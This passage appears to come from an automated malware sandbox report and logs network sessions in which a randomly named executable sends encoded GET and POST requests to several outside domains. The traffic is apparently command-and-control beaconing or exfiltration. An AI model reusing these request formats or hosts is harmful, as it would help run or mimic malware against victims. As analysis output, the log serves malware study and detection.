                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPV7BotGrHneZ3RbIHENEFxkS8XKxBk%2BZXp0saSmPtAfKjYLGLKnz2sKrY6ptGlVn2TXC3U6fW2VqkVUJiU66KpYZHZtRsijCFxdnLobLg4Zj51vs0U6WTza8CLNBQ9WEFHlNlehxfOt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe15995d1219c7-EWR
                                                                                                                                                                                                                                                              Content-Encoding: gzip
Oct 9, 2024 13:38:26.963135958 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49757 | 104.21.50.202 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:28.713229895 CEST | 555 | OUT | GET /p1v4/?FlS=3ldH5dkH-dBLf&9B6h=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.itemfilterhub.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:29.488059044 CEST | 780 | IN | HTTP/1.1 404
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u79sJM3wJ9w0w7Omr2agti1dmKE3RstDMuloNIbuNOuIbY4H6RMpqMiBN281Ovk%2FB9YgSYlkrOuTIUZRPIJC60xg7l%2BiPyGsOLN7Xe7Dysz1lecoCZvvPrGLEUF4i%2F4GtCU0nDZn3mJw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8cfe15a9bdcd7c69-EWR
                                                                                                                                                                                                                                                              Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
Oct 9, 2024 13:38:29.488219023 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.11.20 | 49758 | 203.161.46.205 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:34.796564102 CEST | 811 | OUT | POST /veti/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.bullbord.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.bullbord.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.bullbord.top/veti/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:34.967178106 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:34 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Content-Length: 16052
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.11.20 | 49759 | 203.161.46.205 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:37.500271082 CEST | 831 | OUT | POST /veti/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.bullbord.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.bullbord.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.bullbord.top/veti/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKe6DEn5B+8Xdoghg7DUxmCpRjnG6JRi+Wk1ONffKiHnZcTpLjDtYg9xchvjSDh5WBhSMqkRjNZ35oZKV1k9ztKjDsRijVs8SLyVOBaghJzlYwnMk7qTE6VelA6+O1nlMcQ/m9qE96zUDV95PNOdlWch6esDA6GJwiyZEcEABpw/cFOc=
Oct 9, 2024 13:38:37.669632912 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:37 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Content-Length: 16052
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: :miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.11.20 | 49760 | 203.161.46.205 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:40.202300072 CEST | 1289 | OUT | POST /veti/ HTTP/1.1
Host: www.bullbord.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.bullbord.top
Cache-Control: no-cache
Connection: close
Content-Length: 7369
Content-Type: application/x-www-form-urlencoded
Referer: http://www.bullbord.top/veti/
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:40.372203112 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:38:40 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16052
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.11.20 | 49761 | 203.161.46.205 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe

Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:42.902000904 CEST | 549 | OUT | GET /veti/?9B6h=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&FlS=3ldH5dkH-dBLf HTTP/1.1
Host: www.bullbord.top
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-us
Connection: close
User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:43.068521976 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 11:38:42 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 16052
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Data Ascii: ill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068648100 CEST1289INData Raw: 35 2e 33 33 33 31 35 33 2c 32 39 2e 33 33 32 34 34 20 38 2e 34 39 39 39 36 36 2c 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b
                                                                                                                                                                                                                                                              Data Ascii: 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068661928 CEST1289INData Raw: 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 38 39 2c 31 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c
                                                                                                                                                                                                                                                              Data Ascii: <path id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068914890 CEST1289INData Raw: 34 35 2e 33 35 32 31 20 30 2e 30 35 38 39 32 2c 31 37 2e 39 31 34 31 33 20 30 2e 32 39 34 36 31 2c 33 39 2e 33 36 31 35 33 20 30 2e 37 30 37 30 39 31 2c 35 38 2e 38 30 37 33 38 20 30 2e 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30
                                                                                                                                                                                                                                                              Data Ascii: 45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-op
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.068929911 CEST1289INData Raw: 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 35 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d
                                                                                                                                                                                                                                                              Data Ascii: stroke-opacity:1;" /> <path id="path4556" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069133997 CEST1289INData Raw: 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31
                                                                                                                                                                                                                                                              Data Ascii: " cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-d
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.069150925 CEST1289INData Raw: 20 31 30 2e 35 30 36 30 39 2c 2d 31 35 2e 31 35 36 31 32 20 38 2e 30 35 35 34 35 2c 2d 33 2e 37 37 39 36 35 20 36 2e 36 31 37 30 32 2c 2d 33 2e 32 36 31 32 31 20 36 2e 36 31 37 30 32 2c 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                              Data Ascii: 10.50609,-15.15612 8.05545,-3.77965 6.61702,-3.26121 6.61702,0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity
                                                                                                                                                                                                                                                              Oct 9, 2024 13:38:43.229803085 CEST1289INData Raw: 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                                                                                                              Data Ascii: stroke-linejoin:miter;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.4995


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.11.20 | 49762 | 23.227.38.74 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:49.143647909 CEST | 829 | OUT | POST /y82c/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cannulafactory.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cannulafactory.top/y82c/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:49.532598019 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:49 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              content-language: en-HK
                                                                                                                                                                                                                                                              x-shopify-nginx-no-cookies: 0
                                                                                                                                                                                                                                                              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:49 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_y=6bab0783-0043-4cd0-b2d1-ef924f93f83d; Expires=Thu, 09-Oct-25 11:38:49 GMT; Domain=cannulafactory.top; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_s=c8048fc5-4b7a-4fe6-a81c-481de043f12a; Expires=Wed, 09-Oct-24 12:08:49 GMT; Domain=cannulafactory.top;
Oct 9, 2024 13:38:49.532701969 CEST | 1280 | IN | ath=/; SameSite=Lax
x-request-id: 66a06157-ebea-49d4-9cb0-088011e81920-1728473929
server-timing: processing;dur=243
content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.11.20 | 49763 | 23.227.38.74 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:51.773004055 CEST | 849 | OUT | POST /y82c/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cannulafactory.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cannulafactory.top/y82c/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:52.415227890 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:52 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              content-language: en-HK
                                                                                                                                                                                                                                                              x-shopify-nginx-no-cookies: 0
                                                                                                                                                                                                                                                              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:52 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_y=3d162a42-eb70-4f01-aa59-ffd04ffcecbf; Expires=Thu, 09-Oct-25 11:38:52 GMT; Domain=cannulafactory.top; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_s=d6bd0a50-9099-4704-ac58-8121e8bbcbf4; Expires=Wed, 09-Oct-24 12:08:52 GMT; Domain=cannulafactory.top;
Oct 9, 2024 13:38:52.415242910 CEST | 1280 | IN | Data Ascii: ath=/; SameSite=Lax
x-request-id: 1ef356ca-46db-4689-8d0f-8c4a4a94ef00-1728473931
server-timing: processing;dur=274
content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.11.20 | 49764 | 23.227.38.74 | 80 | 900 | C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:38:54.398884058 CEST | 1289 | OUT | POST /y82c/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.cannulafactory.top
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.cannulafactory.top
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.cannulafactory.top/y82c/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
Oct 9, 2024 13:38:54.689748049 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:38:54 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              x-sorting-hat-podid: 156
                                                                                                                                                                                                                                                              x-sorting-hat-shopid: 68519428253
                                                                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                                                                              x-frame-options: DENY
                                                                                                                                                                                                                                                              x-shopid: 68519428253
                                                                                                                                                                                                                                                              x-shardid: 156
                                                                                                                                                                                                                                                              content-language: en-HK
                                                                                                                                                                                                                                                              x-shopify-nginx-no-cookies: 0
                                                                                                                                                                                                                                                              set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:54 GMT; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_y=77fdd3de-6657-4e10-9ca7-aefa942072f6; Expires=Thu, 09-Oct-25 11:38:54 GMT; Domain=cannulafactory.top; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                              set-cookie: _shopify_s=64c69e05-8692-4034-b483-b1d5831203db; Expires=Wed, 09-Oct-24 12:08:54 GMT; Domain=cannulafactory.top;
Oct 9, 2024 13:38:54.689855099 CEST | 1272 | IN | Data Ascii: ath=/; SameSite=Lax
